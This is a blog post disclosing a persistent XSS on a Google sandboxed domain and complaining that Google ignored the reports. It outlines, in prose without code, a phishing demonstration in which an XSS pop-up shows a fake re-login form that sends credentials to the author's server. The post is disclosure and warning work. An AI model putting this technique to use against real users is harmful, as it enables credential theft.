Exploiting Google persistent XSS vulnerability for phishing

google-hack

Yesterday we have reported that How Bug Bounty programs can play unfair with hackers and researchers, where hackers are submitting their legitimate findings to companies and no surprise if they are getting replies that “Someone else already reported this, you are not eligible for Bounty“. But the main issue is, if companies are really aware about the issue, then why they have not fixed it yet ?

Today we are going to Talk about Google, that How a ignored vulnerability can be brilliantly crafted and exploited by Hackers for phishing users.
On 11th September this year, I have reported a persistent XSS vulnerability in Google and reply from Google Security Team was,”It seems the XSS you reported actually executes on one of our sandboxed domains (googleusercontent.com). The sandboxed domain does not contain any session cookies for google services, nor does it have access to any Google.com data
thehackernews
I said its okay if they are sure about it that its not exploitable and on a Sandboxed domain then conversation is over. Now after two months yesterday another Bulgarian hacker going by name “Keeper” report me that the vulnerability still working even after multiple submissions to Google. Now I was surprised to see that How Google team can be so seriousness about the security of their users.
I have successfully  exploited a Google vulnerability which was ignored by Google itself from last 2 Months.

————Proof of Concept————

1.) Phishing Pages Created on Google at Here
2.) User will land to the page having URL in address bar as Google.com/______
3.) Using Cross site scripting vulnerability I generate a Pop-Up that will convince a Google user to believe that their cookies expired and they have to Login again to access next pages (Please do not enter your original username / password)
4.) The Phishing login form is designed using Google service itself and Points to my EVIL server.
5.) Once user will try to Login, all credentials will save here and page will show “Done” without any reload.

This phishing page is hosted on same sandbox domain, where attacker can’t steal cookies, but its enough to do a perfect phishing. I hope, now Respected Google team will fix it asap after open disclosure with demonstration.

Update: A Google representative quickly reply about the issue and defense them self by saying that “It can’t be used for phishing” because its hosted on a separate host name. Question from readers : Can’t Google see the URL in browser that its “Google.com/—–” , potentially enough for phishing .

By definition : Phishing is tricking users to believe that they are on right webpage and the demonstration successfully showed this.

Google also said that hosting such type of content on Google services is violating their services, but please note that we already follow the non-disclosure way two months ago and its enough time to take action for fixing the bug. By disclosing exploitation with demo is now necessary to make them believe that – It WORKS !!

Note for Google : Either Google can call it under “Same origin policy” or “violation of services” , For an Attacker and a victim your policies are nothing. Even the source of POC is not hosted on Google and we are calling it from our server so we are not violating your any policy. We Respect you and trying to help you to understand the RISK and warning or readers to be aware about such phishing attacks.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s